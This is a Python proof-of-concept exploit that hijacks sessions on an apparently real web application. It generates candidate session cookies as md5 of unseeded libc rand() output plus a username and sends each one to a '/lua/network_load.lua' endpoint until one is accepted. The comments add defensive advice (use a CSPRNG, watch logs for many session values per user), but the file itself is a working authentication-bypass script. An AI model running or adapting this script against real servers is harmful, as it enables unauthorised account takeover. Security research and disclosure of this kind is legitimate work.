import requests
import sys
import hashlib
from ctypes import *
# Proof of concept for a predictable session identifier.
#
# The script computes each candidate `session` cookie as
# md5(<decimal rand() output> + <username>). It never calls srand(), so the
# libc rand() sequence it draws from is the same in every run; it presumably
# works only because the server derives its tokens the same way (assumption,
# the server code is not shown here).
#
# Defensive takeaways:
#   * Session identifiers should come from a CSPRNG (for example the OS
#     random source) and should not be derived from the username.
#   * In access logs, one `user` cookie value paired with many different
#     `session` values over a short period is the pattern this script
#     produces.
#
# NOTE(review): written with Python 2 semantics in mind; the value passed to
# hashlib.md5() is a str, not bytes.

# Handle to the C library, used only for its rand() function.
libc = CDLL('libc.so.6')

if __name__ == "__main__":
    # Both positional arguments are required.
    if not len(sys.argv) >= 3:
        print('[-] Usage: python poc.py <host> <username>')
        sys.exit(1)

    host, username = sys.argv[1:]
    target_url = host + '/lua/network_load.lua'

    # Walk the first 256 outputs of the unseeded generator.
    for attempt in range(256):
        print('[*] Trying with rand() iteration %d...' % attempt)

        # Candidate token: md5 over the decimal rand() value followed by the
        # username.
        rand_text = '%d' % libc.rand()
        session = hashlib.md5(rand_text + username).hexdigest()

        cookie_jar = {'user': username, 'session': session}
        response = requests.get(target_url, cookies=cookie_jar)

        # The script treats any other status code as a rejected cookie and
        # moves on to the next candidate.
        if response.status_code != 200:
            continue

        print('[+] Got it! Valid session cookie is %s for username %s.' % (session, username))
        break